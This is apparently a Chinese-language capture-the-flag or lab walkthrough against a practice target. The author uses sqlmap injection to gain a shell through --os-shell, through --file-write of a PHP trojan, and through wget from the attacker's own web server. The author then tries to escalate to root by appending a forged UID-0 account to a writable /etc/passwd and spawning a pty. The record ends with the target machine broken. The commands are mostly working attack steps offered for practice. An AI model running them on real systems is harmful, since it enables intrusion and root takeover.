继续!
开扫
继续先测试web
sql注入 直接sqlmap跑
通过注入 (sqlmap查询方式省略)
存在systemuser 不知道会不会是电脑的密码 我们解密一下然后直接试试看
然后失败 这里就没有思路了 但是我们刚刚存在一个目录 我们再扫扫看
无果 换另一个目录
扫出来了 /m3diNf0/info.php 去看看
这下就开朗了
因为这里可以获取 绝对路径 那么我们就可以直接通过 sqlmap进行getshell 这里介绍三种
第一种 --os-shell
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
我们就getshell了
第二种 --file-write
一样是通过sqlmap
来上传文件 首先写一个木马
然后通过
--file-write 木马文件 --file-dest 存放目录
上传文件
py3 .\sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --file-write C:\Users\Administrator\Desktop\1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php
上传失败 但是学到了
第三种 wegt
首先就是本机开启web服务
用py即可
py3 -m http.server 8888
开启 服务后 去sqlmap的shell 中下载即可
wget http://10.8.0.174:8888//1.php
这里因为是靶场 所以找不到本身 的ip 后面发现在openvpn里存在
这里就成功
然后我们链接后查看一下 如何提权
首先就是查看/etc/passwd的权限
-rw-r--r-- 1 www-data www-data 1664 Aug 21 2019 /etc/passwd
发现 有w 可写 那么我们就通过 openssl 伪造一下
openssl passwd -1 -salt hack 123456
然后我们看看root怎么写的
root:x:0:0:root:/root:/bin/bash
x为密码 就是上面生成的
hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash
然后通过echo写入
echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd
sudo hack 会报错
我们使用py命令
python -c 'import pty;pty.spawn("/bin/bash")'
但是最后无法实现 靶机被打坏了。。。。。